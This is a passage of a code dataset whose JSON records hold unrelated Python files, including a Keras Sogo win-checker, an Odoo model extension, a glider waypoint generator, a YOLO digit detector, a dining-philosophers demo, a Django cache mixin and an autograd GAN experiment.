K.greater(x1, 3)\n x1 = K.any(x1)\n\n x2 = x * tf.constant(ANTIDIAG13)\n x2 = K.sum(x2, axis=2)\n x2 = K.sum(x2, axis=2)\n x2 = K.greater(x2, 3)\n x2 = K.any(x2)\n\n x3 = x * tf.constant(ANTIDIAG12)\n x3 = K.sum(x3, axis=2)\n x3 = K.sum(x3, axis=2)\n x3 = K.greater(x3, 3)\n x3 = K.any(x3)\n\n x = K.stack([x1, x2, x3])\n return K.any(x)\n\n\ndef fulldiaggreater3(x):\n xs = []\n for filt in [FULLDIAG1, FULLDIAG2, FULLDIAG3, FULLDIAG4]:\n x1 = x * tf.constant(filt)\n x1 = K.sum(x1, axis=1)\n x1 = K.sum(x1, axis=1)\n x1 = K.sum(x1, axis=1)\n x1 = K.greater(x1, 3)\n xs.append(x1)\n\n x = K.stack(xs)\n return K.any(x)\n\n\ndef is_winning(x):\n return K.any(K.stack([greater3(x), diaggreater3(x), fulldiaggreater3(x)]))\n\n\nINPUTS = Input(shape=(4, 4, 4), dtype='int32')\n\nMODEL = Model(INPUTS, Lambda(is_winning)(INPUTS))\n\n\ndef evaluate(state: 
np.ndarray) -> np.ndarray:\n return MODEL.predict(state)[0]\n","sub_path":"ai/mcts/tf_sogo.py","file_name":"tf_sogo.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
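A NumPy-only cross-check of the axis-aligned win test that `greater3` implements in the record above: on a 4x4x4 binary board, a completed row along a coordinate axis is exactly an axis sum reaching 4. This sketch is independent of the Keras graph:

```python
# NumPy cross-check of the axis win test above: any axis sum of a 4x4x4
# binary board reaching 4 means four in a row along that axis.
import numpy as np

def axis_win(board):
    return any((board.sum(axis=ax) >= 4).any() for ax in range(3))

board = np.zeros((4, 4, 4), dtype=np.int32)
board[1, 2, :] = 1          # four in a row along the third axis
print(axis_win(board))      # True
```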
+{"seq_id":"189336510","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass cust_form_custom(models.Model):\n _inherit = 'res.partner'\n\n father_name = fields.Char(string=\"Father/Husband's Name\")\n cnic_no = fields.Char(string=\"CNIC #\")\n postal_address = fields.Text(string=\"Postal Address\")\n mobile_no = fields.Char(string=\"Mobile\")\n phone_office = fields.Char(string=\"Phone Number (Office)\")\n phone_res = fields.Char(string=\"Phone Number (Res)\")\n nom_name = fields.Char(string=\"Name\")\n nom_father_name = fields.Char(string=\"Father / Husband /Guardian\")\n nom_cnic = fields.Char(string=\"CNIC#\")\n nom_blood_rel = fields.Char(string=\"Blood Relation\")\n photograph = fields.Binary(string=\"2 Passport Size photographs\")\n cnic_copy = fields.Binary(string=\"CNIC Copy\")\n nom_photo_cnic = fields.Binary(string=\"Nominated Person's CNIC Copy\")\n\n\n\n\n @api.multi\n def import_photograph(self):\n fileobj = TemporaryFile('w+')\n fileobj.write(base64.decodestring(photograph))\n return\n\n def import_cnic_copy(self):\n fileobj = TemporaryFile('w+')\n fileobj.write(base64.decodestring(cnic_copy))\n return\n \n def import_nom_photo_cnic(self):\n fileobj = TemporaryFile('w+')\n fileobj.write(base64.decodestring(nom_photo_cnic))\n return\n\n\n\nclass prod_tmp_custm(models.Model):\n _inherit = 'product.template'\n\n plot_no = fields.Integer(string=\"Plot Number\")\n street_no = fields.Integer(string=\"Street Number\")\n plot_priority = fields.Char(string=\"Plot Priority\")\n normal = fields.Boolean(string=\"Normal\")\n corner = fields.Boolean(string=\"Corner (Extra 10 %)\")\n boulevard = fields.Boolean(string=\"Boulevard (10%)\")\n park_facing = fields.Boolean(string=\"Park Facing (Extra 10%)\")\n extra_land = fields.Char(string=\"Extra Land\")\n extra_price = fields.Float(string=\"Extra Price\")\n total_price = fields.Float(string=\"Total Price\")\n\n\n","sub_path":"crowncity/crowncity/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"548724284","text":"'''\n This file tests the GOTO_LXY.MA file creation aspects of GliderFileTools\n'''\nfrom gpplib.GliderFileTools import *\nimport random\nfrom sets import Set\nimport gpplib\nfrom gpplib.Utils import *\nfrom gpplib.GenGliderModelUsingRoms import *\nfrom gpplib.SA_Replanner import *\nfrom gpplib.LatLonConversions import *\n\n''' Code for a simple planner. Here we use a Min-Expected-Risk planner.\n'''\ndef GetPathFromStartToGoal(start,goal):\n sp_mst,dist = sarp.GetShortestPathMST(goal)\n path_to_goal=sp_mst['(%d,%d)'%(start[0],start[1])]['(%d,%d)'%(goal[0],goal[1])]\n return path_to_goal\n\n''' Come up with a sample plan... '''\nconf = gpplib.Utils.GppConfig()\nyy,mm,dd,numDays = 2011,2,1,2\nstart,goal=(0,6),(8,1)\n \nsarp = SA_Replanner(conf.myDataDir+'RiskMap.shelf',conf.myDataDir+'roms/')\n#sarp.GetTransitionModelFromShelf(yy,mm,dd,numDays,0.1,0.01,conf.myDataDir+'NoisyGliderModels2')\nu,v,time1,depth,lat,lon = sarp.GetRomsData(yy,mm,dd,numDays)\n#sarp.CreateExpRiskGraph() # Run a Min-Exp-Risk replanner\nsarp.CreateMinRiskGraph()\npath_to_goal = GetPathFromStartToGoal(start,goal)\n\n\n''' Code to write out a goto_lXY.ma file. Here we are going to write out to GOTO_L16.MA\n'''\n\n# Create our own .MA file from scratch.\nnew_goto_beh = GotoListFromGotoLfileGliderBehavior()\n\ngldrEnums=GliderWhenEnums()\nnew_goto_beh.SetNumLegsToRun(gldrEnums.num_legs_to_run_enums['TRAVERSE_LIST_ONCE'])\nnew_goto_beh.SetStartWhen(gldrEnums.start_when_enums['BAW_IMMEDIATELY'])\nnew_goto_beh.SetStopWhen(gldrEnums.stop_when_enums['BAW_WHEN_WPT_DIST'])\nnew_goto_beh.SetInitialWaypoint(gldrEnums.initial_wpt_enums['CLOSEST'])\n\nllconv = LLConvert()\nw_lat,w_lon = [],[]\nfor loc in path_to_goal:\n x,y = sarp.gm.GetXYfromNodeStr(loc)\n lat,lon = sarp.gm.GetLatLonfromXY(x,y)\n wlat, wlon = llconv.DecimalDegToWebb(lat,lon)\n w_lat.append(wlat); w_lon.append(wlon)\nnew_goto_beh.SetWaypointListInWebbCoods(w_lat,w_lon)\nAutoGenerateGotoLLfile(new_goto_beh,16)\n\n''' Might want to go to http://cinaps.usc.edu/gliders/waypoints.php to test the output GOTO_L16.MA file.\n'''","sub_path":"GliderDataPython/debugGotoLLfileCreation.py","file_name":"debugGotoLLfileCreation.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"418216772","text":"import json\r\nimport cv2\r\nfrom yolo.backend.utils.box import draw_scaled_boxes\r\nimport os\r\nimport yolo\r\nfrom yolo.frontend import create_yolo\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom itertools import permutations\r\n\r\ndef detector(image_loc):\r\n # 1. create yolo instance\r\n yolo_detector = create_yolo(\"ResNet50\", [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"], 416)\r\n \r\n # 2. load pretrained weighted file\r\n DEFAULT_WEIGHT_FILE = os.path.join(yolo.PROJECT_ROOT, \"weights.h5\")\r\n yolo_detector.load_weights(DEFAULT_WEIGHT_FILE)\r\n \r\n # 3. Load images\r\n DEFAULT_IMAGE_FOLDER = \"Machine_Learning\\\\imgs\"\r\n\r\n img_files = [os.path.join(DEFAULT_IMAGE_FOLDER, image_loc)]\r\n print(img_files)\r\n imgs = []\r\n for fname in img_files:\r\n img = cv2.imread(fname)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n imgs.append(img)\r\n #plt.imshow(img)\r\n #plt.show()\r\n \r\n # 4. Predict digit region\r\n THRESHOLD = 0.3\r\n for img in imgs:\r\n boxes, probs = yolo_detector.predict(img, THRESHOLD)\r\n \r\n return probs\r\n\r\ndef first_nonzero(arr, axis, invalid_val=-1):\r\n mask = arr!=0\r\n return np.where(mask.any(axis=axis), mask.argmax(axis=axis), invalid_val)\r\ndef get_number(prob_buffer):\r\n if (len(prob_buffer)==0):\r\n return str(-1)\r\n output_vector = first_nonzero(prob_buffer,axis=1,invalid_val=-1)\r\n output = \"\"\r\n \r\n for val in output_vector:\r\n output += str(val)\r\n return output\r\n\r\ndef check_if_correct(answer_value, detect):\r\n if(detect=='-1'):\r\n return -1\r\n \r\n answer_len = len(answer_value)\r\n detection_len = len(detect)\r\n tracker = answer_len\r\n av_array = []\r\n detect_array = []\r\n \r\n for i in answer_value:\r\n av_array.append(int(i))\r\n\r\n for i in detect:\r\n detect_array.append(int(i))\r\n\r\n while tracker <= detection_len:\r\n perms = permutations(detect_array, tracker)\r\n for values in perms:\r\n if values == tuple(av_array):\r\n return int(answer_value)\r\n tracker += 1\r\n return int(detect)\r\n\r\n#print(\"This is answer(19):\",check_if_correct(\"19\",get_number(detector(\"answer_1.png\"))))","sub_path":"Machine_Learning/Machine_Learning.py","file_name":"Machine_Learning.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"625066854","text":"import time\nimport random\nfrom threading import Thread\n\nfilosofos = []\ngarfos = []\n\n\nclass Filosofo():\n def __init__(self, nome):\n self.nome = nome\n self.comendo = False\n self.comeu = False\n\n\ndef Comer(filosofo):\n inicio = time.time()\n\n filosofo.comendo = True\n SetGarfoEsquerdo(filosofo, True)\n SetGarfoDireito(filosofo, True)\n\n time.sleep(5)\n\n filosofo.comendo = False\n filosofo.comeu = True\n SetGarfoEsquerdo(filosofo, False)\n SetGarfoDireito(filosofo, False)\n fim = time.time()\n print(\"Quantum = \" ,fim - inicio)\n\n\ndef TodosJaComeram():\n for filosofo in filosofos:\n if not filosofo.comeu:\n return False\n return True\n\n\ndef NovaRodada():\n for filosofo in filosofos:\n filosofo.comeu =False\n\n\n\ndef Rodizio():#semaforo, seleciona o proximo e escalonamento pq ele vai escolher o prox\n\n if TodosJaComeram():#timesharing, ele so vai comer denovo quando todos os outros estiverem comidos\n NovaRodada();\n\n filosofo = random.choice(filosofos)\n\n\n if filosofo.comendo == False and filosofo.comeu == False:\n GarfoEsquerdo = GetGarfoEsquerdo(filosofo)\n GarfoDireito = GetGarfoDireito(filosofo)\n\n if not GarfoEsquerdo and not GarfoDireito: #dois garfos falsos = LIVRES\n Thread(target=Comer, args=(filosofo,)).start()\n\n\n time.sleep(.1)\n Rodizio()\n\n\ndef Tela():\n while True:\n\n print('')\n print('----------------------')\n print('')\n\n for filosofo in filosofos:\n\n if filosofo.comendo:\n estado = 'esta comendo'\n else:\n estado = ' '\n print(GetGarfoEsquerdo(filosofo),' ', filosofo.nome, estado )\n\n\n time.sleep(2)\n\n\n\ndef SetGarfoEsquerdo(filosofo, garfo):\n posicao = filosofos.index(filosofo)\n garfos[posicao] = garfo\n\n\ndef SetGarfoDireito(filosofo, garfo):\n posicao = filosofos.index(filosofo)\n if posicao == 4:\n garfos[0] = garfo\n else:\n garfos[posicao+1] = garfo\n\n\ndef GetGarfoEsquerdo(filosofo):\n posicao = filosofos.index(filosofo)\n return garfos[posicao]\n\ndef GetGarfoDireito(filosofo):\n posicao = filosofos.index(filosofo)\n if posicao == 4:\n return garfos[0]\n else:\n return garfos[posicao+1]\n\n\n\nif __name__ == '__main__':\n garfos.append(False)\n garfos.append(False)\n garfos.append(False)\n garfos.append(False)\n garfos.append(False)\n\n filosofos.append(Filosofo('Aristóteles'))\n filosofos.append(Filosofo('Descartes'))\n filosofos.append(Filosofo('Platão'))\n filosofos.append(Filosofo('Pitágoras'))\n filosofos.append(Filosofo('Euclides'))\n\n Thread(target=Tela, args=()).start() ##paralela\n Rodizio()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"541290776","text":"\ndef f(word):\n desired_length = 0\n desired_substring = ''\n # Insert your code here\n l=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n ll=[]\n for x in word:\n ll.append(x)\n n1=len(l)\n n2=len(ll)\n #print(ll)\n r=[]\n count=1\n for i in range(n2):\n for j in range(i,n2):\n for z in range(n1):\n if ll[i:j]==l[z:z+j-i]:\n r.append(j-i)\n \n desired_substring=max(r) \n\n print(f'The longest substring of consecutive letters has a length of {desired_length}.')\n print(f'The leftmost such substring is {desired_substring}.')\nf('xy')\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"9021 principle of programming/作业成绩/mid_term/z5143964.files/tt.py","file_name":"tt.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"543634893","text":"\"\"\"\nn이 백만이라 정렬 자체는 퀵소트 쓰면 1초 시간제한은 무난할 것 같음\n\"\"\"\n\nimport sys\nreadline = lambda: sys.stdin.readline().rstrip()\n\nclass Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def print(self):\n print('{x} {y}'.format(x=self.x, y=self.y))\n\n\nif __name__ == '__main__':\n N = int(readline())\n points = []\n for _ in range(N):\n x, y = map(int, readline().split())\n points.append(Point(x, y))\n \n sorted_points = sorted(points, key = lambda x: (x.x, x.y))\n for point in sorted_points:\n point.print()","sub_path":"baekjoonOJ/11650/11650.py","file_name":"11650.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"59675913","text":"from django.core.cache import caches\nfrom django.views.decorators.cache import (cache_page,\n\n)\nfrom django.views.decorators.vary import (vary_on_cookie,\n)\n\n\nclass CachPageVaryOnCookieMixin:\n \"\"\"mixin cahing a single page. Subclass can provide this attributes\n 'cach_name' - name of cache to use\n 'time' - cache timeout for this page. when not provided the default time out is used\"\"\"\n\n cache_name = 'default'\n\n @classmethod\n def get_timeout(cls):\n if hasattr(cls, 'timeout'):\n return cls.timeout\n cache = caches[cls.cache_name]\n return cache.default_timeout\n\n @classmethod\n def as_view(cls, *args, **kwargs):\n view = super().as_view(*args, **kwargs)\n view = vary_on_cookie(view)\n view = cache_page(\n timeout=cls.get_timeout(),\n cache=cls.cache_name,\n )(view)\n return view","sub_path":"core/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"262677049","text":"# Implements a Generative Adversarial Network, from\r\n# arxiv.org/abs/1406.2661\r\n# but, it always collapses to generating a single image.\r\n# Let me know if you can get it to work! - David Duvenaud\r\n\r\nfrom __future__ import absolute_import, division\r\nfrom __future__ import print_function\r\nimport autograd.numpy as np\r\nimport autograd.numpy.random as npr\r\nfrom autograd import multigrad\r\nfrom autograd.util import flatten\r\nimport matplotlib.pyplot as plt\r\nimport subprocess, os\r\nfrom mylib import util\r\n\r\n### Define geneerator, discriminator, and objective ###\r\n\r\ndef relu(x): return np.maximum(0, x)\r\ndef sigmoid(x): return 0.5 * (np.tanh(x) + 1.0)\r\ndef logsigmoid(x): return x - np.logaddexp(0, x)\r\ndef leaky_relu(x): return np.maximum(0, x) + np.minimum(0, x) * 0.001\r\n\r\ndef init_random_params(scale, layer_sizes, rs=npr.RandomState(0)):\r\n \"\"\"Build a list of (weights, biases) tuples,\r\n one for each layer in the net.\"\"\"\r\n return [(scale * rs.randn(m, n), # weight matrix\r\n scale * rs.randn(n)) # bias vector\r\n for m, n in zip(layer_sizes[:-1], layer_sizes[1:])]\r\n\r\ndef batch_normalize(activations):\r\n mbmean = np.mean(activations, axis=0, keepdims=True)\r\n return (activations - mbmean) / (np.std(activations, axis=0, keepdims=True) + 1)\r\n\r\ndef neural_net_predict_gen(params, inputs):\r\n \"\"\"Params is a list of (weights, bias) tuples.\r\n inputs is an (N x D) matrix.\"\"\"\r\n inpW, inpb = params[0]\r\n inputs = leaky_relu(np.dot(inputs, inpW) + inpb)\r\n for W, b in params[1:-1]:\r\n outputs = np.dot(inputs, W) + b\r\n outputs = batch_normalize(np.dot(inputs, W) + b)\r\n inputs = leaky_relu(outputs)\r\n outW, outb = params[-1]\r\n outputs = np.dot(inputs, outW) + outb\r\n return outputs\r\n\r\ndef neural_net_predict_dsc(params, inputs):\r\n \"\"\"Params is a list of (weights, bias) tuples.\r\n inputs is an (N x D) matrix.\"\"\"\r\n inpW, inpb = params[0]\r\n inputs = relu(np.dot(inputs, inpW) + inpb)\r\n for W, b in params[1:-1]:\r\n outputs = np.dot(inputs, W) + b\r\n # outputs = batch_normalize(np.dot(inputs, W) + b)\r\n inputs = leaky_relu(outputs)\r\n # inputs = relu(outputs)\r\n outW, outb = params[-1]\r\n outputs = np.dot(inputs, outW) + outb\r\n return outputs\r\n\r\ndef generate_from_noise(gen_params, num_samples, noise_dimZ, rs):\r\n noise = rs.randn(num_samples, noise_dimZ)\r\n samples = neural_net_predict_gen(gen_params, noise)\r\n return sigmoid(samples)\r\n\r\ndef igp_hat(zs, noiseX):\r\n # noiseX is unit gaussian\r\n\r\n # true_means_0 = np.array([-1, 1, -1, 3, 4])\r\n # true_means_1 = np.array([1, -1, 2, 3, 0])\r\n\r\n true_means_0 = np.array([-50])\r\n true_means_1 = np.array([50])\r\n \r\n std = 1.00\r\n # differs in last column, is 2 instead of 0.\r\n alt_means_1 = np.array([1, -1, 2, 3, 2])\r\n # xs = true_means_0 + zs * alt_means_1\r\n xs = (1-zs) * true_means_0 + zs * true_means_1\r\n # xs = np.minimum(6, xs)\r\n # xs = np.maximum(-6, xs)\r\n xs = xs + std*noiseX\r\n # xs = xs + np.random.normal(0, std, xs.shape)\r\n return xs \r\n\r\ndef gan_objective(gen_params, dsc_params, real_data, num_samples, noise_dimZ, noise_dimX, rs):\r\n fake_z = generate_from_noise(gen_params, num_samples, noise_dimZ, rs)\r\n noiseX = rs.randn(num_samples, noise_dimX)\r\n fake_data = igp_hat(fake_z, noiseX)\r\n # fake_data = fake_z\r\n assert fake_data.shape == real_data.shape\r\n logprobs_fake = logsigmoid(neural_net_predict_dsc(dsc_params, fake_data))\r\n logprobs_real = 
logsigmoid(neural_net_predict_dsc(dsc_params, real_data))\r\n # import code; code.interact(local=dict(globals(), **locals()))\r\n return np.mean(logprobs_real) - np.mean(logprobs_fake)\r\n\r\ndef entropy_objective(gen_params, batch_size, noise_dimZ, rs, neighbors_function):\r\n # try to maximize entropy\r\n fake_z = generate_from_noise(gen_params, batch_size, noise_dimZ, rs)\r\n\r\n neighbors = neighbors_function(fake_z)\r\n\r\n entropy_loss = 0\r\n for i in range(len(fake_z)):\r\n sq_dist = 0\r\n if i == neighbors[i][0] or i == neighbors[i][1]:\r\n continue\r\n left_dist = fake_z[i] - fake_z[neighbors[i][0]]\r\n right_dist = fake_z[neighbors[i][1]] - fake_z[i]\r\n assert left_dist >= 0 and right_dist >= 0, 'not sorted'\r\n left_dist = max(1e-5, left_dist)\r\n right_dist = max(1e-5, right_dist)\r\n sq_dist += 0.5 * np.log(left_dist) + 0.5 * np.log(right_dist)\r\n entropy_loss += -sq_dist\r\n return entropy_loss / len(fake_z - 1)\r\n\r\ndef alphabetize(num):\r\n assert num < 26**3, 'num bigger than 17576'\r\n mapper = {0: 'a', 1: 'b', 2: 'c', 3: 'd', 4: 'e', 5: 'f', 6: 'g', 7: 'h', 8: 'i', 9: 'j', 10: 'k', 11: 'l', 12: 'm', 13: 'n', 14: 'o', 15: 'p', 16: 'q', 17: 'r', 18: 's', 19: 't', 20: 'u', 21: 'v', 22: 'w', 23: 'x', 24: 'y', 25: 'z'}\r\n hundreds = int(num / (26*26)) % 26\r\n tens = int(num / 26) % 26\r\n ones = num % 26\r\n return ''.join([mapper[hundreds], mapper[tens], mapper[ones]])\r\n\r\ndef save_images(fake_z, fake_data, real_data, out_dir, nm, dsc_params, vmin=0, vmax=1):\r\n # plot Z\r\n assert not np.isnan(fake_z).any(), 'NaN in fake_z'\r\n rmax = int( max(1, max(fake_z)) )\r\n rmin = int( min(0, min(fake_z)))\r\n binsize = (int(rmax) - int(rmin)) / 100\r\n plt.hist(fake_z, bins = np.arange(rmin, rmax, binsize))\r\n plt.ylabel('Histogram counts', color = 'b')\r\n plt.xlim([rmin, rmax])\r\n plt.title('Generated Z')\r\n plt.savefig(out_dir + 'gan_samples_Z_' + nm + '.png')\r\n plt.close()\r\n\r\n\r\n rmax = max(max(real_data), max(fake_data))\r\n rmin = min(min(real_data), min(fake_data))\r\n binsize = (rmax - rmin) / 100\r\n # plot X\r\n query_pts = np.arange(rmin, rmax, binsize)\r\n curr_dsc = sigmoid(neural_net_predict_dsc(dsc_params, query_pts.reshape(len(query_pts), 1)))\r\n fig, ax1 = plt.subplots()\r\n ax1.hist(fake_data, bins = np.arange(rmin, rmax, binsize),\r\n color = 'b',\r\n alpha = 0.5)\r\n ax1.hist(real_data, bins = np.arange(rmin, rmax, binsize), \r\n color = 'g', \r\n alpha = 0.5)\r\n ax1.set_ylabel('Histogram counts', color = 'b')\r\n ax1.tick_params('y', colors = 'b')\r\n ax1.set_xlim(rmin, rmax)\r\n ax2 = ax1.twinx()\r\n ax2.plot(np.arange(rmin, rmax, binsize), curr_dsc, 'r')\r\n ax2.set_ylabel('Discriminator label | 0=real ; 1=fake', \r\n color = 'r')\r\n ax2.set_ylim(0, 1)\r\n ax2.tick_params('y', colors = 'r')\r\n fig.tight_layout()\r\n plt.title('Generated X')\r\n plt.savefig(out_dir + 'gan_samples_X_' + nm + '.png')\r\n plt.close()\r\n return\r\n\r\n### Define minimax version of adam optimizer ###\r\n\r\ndef adam_minimax(grad_both, init_params_max, init_params_min, neighbors_function, callback=None, num_iters=100,\r\n step_size_max=0.001, step_size_min=0.001, b1=0.9, b2=0.999, eps=10**-8):\r\n \"\"\"Adam modified to do minimiax optimization, for instance to help with\r\n training generative adversarial networks.\"\"\"\r\n\r\n def exponential_decay(step_size_min, step_size_max):\r\n if step_size_min > 0.0001:\r\n step_size_min *= 0.99\r\n if step_size_max > 0.001:\r\n step_size_max *= 0.99\r\n return step_size_min, step_size_max\r\n\r\n x_max, 
unflatten_max = flatten(init_params_max)\r\n x_min, unflatten_min = flatten(init_params_min)\r\n\r\n m_max = np.zeros(len(x_max))\r\n v_max = np.zeros(len(x_max))\r\n m_min = np.zeros(len(x_min))\r\n v_min = np.zeros(len(x_min))\r\n\r\n K = 1\r\n\r\n for i in range(num_iters):\r\n g_max_uf, g_min_uf = grad_both(unflatten_max(x_max),\r\n unflatten_min(x_min), i, neighbors_function)\r\n g_max, _ = flatten(g_max_uf)\r\n g_min, _ = flatten(g_min_uf)\r\n\r\n if callback: \r\n callback(unflatten_max(x_max), \r\n unflatten_min(x_min), \r\n i, \r\n unflatten_max(g_max), \r\n unflatten_min(g_min))\r\n\r\n step_size_min, step_size_max = exponential_decay(step_size_min, step_size_max)\r\n\r\n # Update generator (maximizer)\r\n m_max = (1 - b1) * g_max + b1 * m_max # First moment estimate.\r\n v_max = (1 - b2) * (g_max**2) + b2 * v_max # Second moment estimate.\r\n mhat_max = m_max / (1 - b1**(i + 1)) # Bias correction.\r\n vhat_max = v_max / (1 - b2**(i + 1))\r\n x_max = x_max + step_size_max * mhat_max / (np.sqrt(vhat_max) + eps)\r\n\r\n # Update discriminator (minimizer)\r\n m_min = (1 - b1) * g_min + b1 * m_min # First moment estimate.\r\n v_min = (1 - b2) * (g_min**2) + b2 * v_min # Second moment estimate.\r\n mhat_min = m_min / (1 - b1**(i + 1)) # Bias correction.\r\n vhat_min = v_min / (1 - b2**(i + 1))\r\n x_min = x_min - step_size_min * mhat_min / (np.sqrt(vhat_min) + eps)\r\n\r\n for k in range(K-1):\r\n g_max_uf, g_min_uf = grad_both(unflatten_max(x_max),\r\n unflatten_min(x_min), i, neighbors_function)\r\n g_min, _ = flatten(g_min_uf)\r\n\r\n # Update discriminator (minimizer)\r\n m_min = (1 - b1) * g_min + b1 * m_min # First moment estimate.\r\n v_min = (1 - b2) * (g_min**2) + b2 * v_min # Second moment estimate.\r\n mhat_min = m_min / (1 - b1**(i + 1)) # Bias correction.\r\n vhat_min = v_min / (1 - b2**(i + 1))\r\n x_min = x_min - step_size_min * mhat_min / (np.sqrt(vhat_min) + eps)\r\n\r\n return unflatten_max(x_max), unflatten_min(x_min)\r\n\r\n\r\ndef create_gif(out_dir):\r\n print('Creating GIF...')\r\n subprocess.call('convert -delay 15 -loop 0 ' + out_dir + '*_X_*.png ' + out_dir + '_anim_X.gif', shell = True)\r\n subprocess.call('convert -delay 15 -loop 0 ' + out_dir + '*_Z_*.png ' + out_dir + '_anim_Z.gif', shell = True)\r\n print('Done.')\r\n return\r\n\r\ndef count_num_folders(out_dir):\r\n for fold in os.listdir(out_dir):\r\n assert os.path.isdir(out_dir + fold), 'Not a folder!'\r\n return len(os.listdir(out_dir))\r\n \r\ndef copy_script(out_dir):\r\n src_dir = '/cluster/mshen/prj/gans/src/'\r\n script_nm = __file__\r\n subprocess.call('cp ' + src_dir + script_nm + ' ' + out_dir, shell = True)\r\n return\r\n\r\ndef save_gen_params(gen_params, gp_out_dir, nm):\r\n np.savetxt(gp_out_dir + nm + '_00.csv', gen_params[0][0], delimiter = ',')\r\n np.savetxt(gp_out_dir + nm + '_01.csv', gen_params[0][1], delimiter = ',')\r\n np.savetxt(gp_out_dir + nm + '_10.csv', gen_params[1][0], delimiter = ',')\r\n np.savetxt(gp_out_dir + nm + '_11.csv', gen_params[1][1], delimiter = ',')\r\n return\r\n\r\n### Setup and run ###\r\n\r\nif __name__ == '__main__':\r\n out_place = '/cluster/mshen/prj/gans/out/2017-06-19/c_gan/'\r\n num_folds = count_num_folders(out_place)\r\n out_dir = out_place + alphabetize(num_folds + 1) + '/'\r\n util.ensure_dir_exists(out_dir)\r\n gen_params_out_dir = out_dir + 'gen_params/'\r\n util.ensure_dir_exists(gen_params_out_dir)\r\n print('outdir: ' + alphabetize(num_folds + 1))\r\n\r\n copy_script(out_dir)\r\n counter = 0\r\n\r\n # Model hyper-parameters\r\n noise_dimZ 
= 1\r\n noise_dimX = 1\r\n gen_layer_sizes = [noise_dimZ, 16, 1]\r\n dsc_layer_sizes = [1, 16, 16, 1]\r\n\r\n # Training parameters\r\n gen_param_scale = 0.1 # generate diverse samples\r\n dsc_param_scale = 0.1 # ensure 50/50 prior\r\n # batch_size = 10000\r\n batch_size = 200\r\n num_epochs = 100\r\n step_size_max = 0.10\r\n # step_size_max = 0.005\r\n step_size_min = 0.001\r\n\r\n\r\n print(\"Loading training data...\")\r\n train_data = np.loadtxt('/cluster/mshen/prj/gans/out/2017-06-19/a_generate/gaussian_noisy/X.csv', delimiter = ',')\r\n train_data = train_data.reshape(len(train_data), 1)\r\n\r\n # train_data = np.loadtxt('/cluster/mshen/prj/gans/out/2017-06-19/a_generate/X.csv', delimiter = ',')\r\n # train_data = train_data.reshape(len(train_data), 1)\r\n\r\n init_gen_params = init_random_params(gen_param_scale, gen_layer_sizes)\r\n init_dsc_params = init_random_params(dsc_param_scale, dsc_layer_sizes)\r\n\r\n num_batches = int(np.ceil(len(train_data) / batch_size))\r\n def batch_indices(iter):\r\n idx = iter % num_batches\r\n return slice(idx * batch_size, (idx+1) * batch_size)\r\n\r\n def neighbors_function(data):\r\n data = list(data)\r\n sorteddata = sorted(data) # fast: 0.1 seconds or less\r\n ns = []\r\n # print('Constructing neighbors...')\r\n # timer = util.Timer(total = len(data))\r\n for i, d in enumerate(data):\r\n if sorteddata.index(d) > 0:\r\n n1 = data.index( sorteddata[ sorteddata.index(d) - 1 ] )\r\n else:\r\n n1 = data.index( d )\r\n try:\r\n n2 = data.index( sorteddata[ sorteddata.index(d) + 1 ] )\r\n except IndexError:\r\n n2 = data.index(d)\r\n ns.append( np.array([n1, n2]) )\r\n # timer.update()\r\n # print('Done with neighbors')\r\n return np.array(ns) \r\n\r\n # Define training objective\r\n seed = npr.RandomState(1)\r\n def objective(gen_params, dsc_params, iter, neighbors_function):\r\n idx = batch_indices(iter)\r\n c1, c2 = c1c2_schedule(iter)\r\n return c1 * gan_objective(gen_params, dsc_params, \r\n train_data[idx], \r\n batch_size, \r\n noise_dimZ,\r\n noise_dimX, \r\n seed) - \\\r\n c2 * entropy_objective(gen_params, \r\n batch_size, \r\n noise_dimZ, \r\n seed, \r\n neighbors_function)\r\n\r\n def c1c2_schedule(iter):\r\n if iter < 50:\r\n return 0, 1\r\n else:\r\n return 1, 0.2\r\n return c1, c2\r\n\r\n # Get gradients of objective using autograd.\r\n both_objective_grad = multigrad(objective, argnums=[0,1])\r\n\r\n print(\" Epoch | Objective | Fake probability | Real Probability \")\r\n def print_perf(gen_params, dsc_params, iter, gen_gradient, dsc_gradient):\r\n if iter % 10 == 0:\r\n ability = np.mean(objective(gen_params, dsc_params, iter, neighbors_function))\r\n \r\n fake_z = generate_from_noise(gen_params, 10000, noise_dimZ, seed)\r\n noiseX = seed.randn(10000, noise_dimX)\r\n fake_data = igp_hat(fake_z, noiseX)\r\n \r\n # fake_data = fake_z\r\n \r\n real_data = train_data\r\n probs_fake = np.mean(sigmoid(neural_net_predict_dsc(dsc_params, fake_data)))\r\n probs_real = np.mean(sigmoid(neural_net_predict_dsc(dsc_params, real_data)))\r\n print(\"{:15}|{:20}|{:20}|{:20}\".format(iter//num_batches, ability, probs_fake, probs_real))\r\n save_images(fake_z, fake_data, real_data, out_dir, alphabetize(int(iter/10)), dsc_params, vmin=0, vmax=1)\r\n save_gen_params(gen_params, 